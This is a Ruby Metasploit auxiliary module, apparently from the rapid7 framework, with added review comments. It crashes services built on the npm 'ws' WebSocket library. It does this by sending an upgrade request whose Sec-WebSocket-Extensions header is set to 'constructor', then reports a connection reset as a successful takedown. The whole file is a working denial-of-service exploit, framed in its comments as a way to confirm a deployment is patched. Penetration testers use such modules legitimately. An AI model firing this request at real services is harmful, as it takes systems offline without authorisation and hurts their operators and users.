rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/ws_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
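# Auxiliary module for the denial-of-service condition in the npm "ws"
# WebSocket library that is triggered by the Sec-WebSocket-Extensions header
# on the initial upgrade request.
#
# The module sends one upgrade request and then classifies the outcome:
# * a reset or EOF on the socket is reported as the service having gone down;
# * a genuine "101" status line is reported as the upgrade succeeding, i.e.
#   the service handled the header and is not affected;
# * anything else is treated as inconclusive.
#
# Because 'Stability' is CRASH_SERVICE_DOWN, a positive result means the
# target process has stopped. Use it only to validate that a deployment has
# picked up a fixed "ws" release.
#
# NOTE(review): confirm that the CVE id listed under 'References' is the one
# assigned to the Sec-WebSocket-Extensions advisory linked next to it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the two user-facing options
  # (RPORT, default 3000, and TARGETURI, default '/').
  def initialize
    super(
      'Name' => 'ws - Denial of Service',
      'Description' => %q{
        This module exploits a Denial of Service vulnerability in npm module "ws".
        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
      },
      'References' => [
        ['CVE', '2016-10542'],
        ['URL', 'https://nodesecurity.io/advisories/550'],
        ['CWE', '400'],
      ],
      'Author' => [
        'Ryan Knell, Sonatype Security Research',
        'Nick Starke, Sonatype Security Research',
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        # The target service is expected to go down when affected.
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    register_options([
      Opt::RPORT(3000),
      OptString.new('TARGETURI', [true, 'The base path', '/']),
    ])
  end

  # Sends the upgrade request and reports whether the service survived it.
  #
  # Outcomes:
  # * connection refused      -> target was not reachable, nothing was tested
  # * ECONNRESET / EOFError   -> service stopped responding (affected)
  # * "101" status line       -> upgrade handled normally (not affected)
  # * any other reply         -> fail_with(Failure::Unknown)
  #
  # @return [void]
  def run
    path = datastore['TARGETURI']

    # Create HTTP request
    req = [
      "GET #{path} HTTP/1.1",
      'Connection: Upgrade',
      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}",
      'Sec-WebSocket-Version: 8',
      'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS
      'Upgrade: websocket',
      "\r\n"
    ].join("\r\n")

    begin
      connect
      print_status("Sending DoS packet to #{peer}")
      sock.put(req)

      # Attempt to retrieve data from the socket.
      # NOTE(review): presumably nil when nothing arrives before the read
      # timeout; to_s below keeps that case on the "inconclusive" branch.
      data = sock.get_once(-1)

      # Only an HTTP status line carrying code 101 counts as a valid upgrade
      # response. Matching "101" anywhere in the reply would misreport an
      # error response that merely contains those digits (e.g. in a
      # Content-Length or Date header) as "not vulnerable".
      if data.to_s.match?(%r{\AHTTP/\d\.\d 101\b})
        print_error('WebSocket Upgrade request Successful, service not vulnerable.')
      else
        fail_with(Failure::Unknown, 'An unknown error occurred')
      end

      print_error('DoS packet unsuccessful')
    rescue ::Rex::ConnectionRefused
      print_error("Unable to connect to #{peer}")
    rescue ::Errno::ECONNRESET, ::EOFError
      # The peer dropped the connection instead of answering the upgrade.
      print_good("DoS packet successful. #{peer} not responding.")
    ensure
      # Release the socket on every exit path, including the rescue branches
      # and the fail_with abort, not only after a successful upgrade.
      disconnect
    end
  end
end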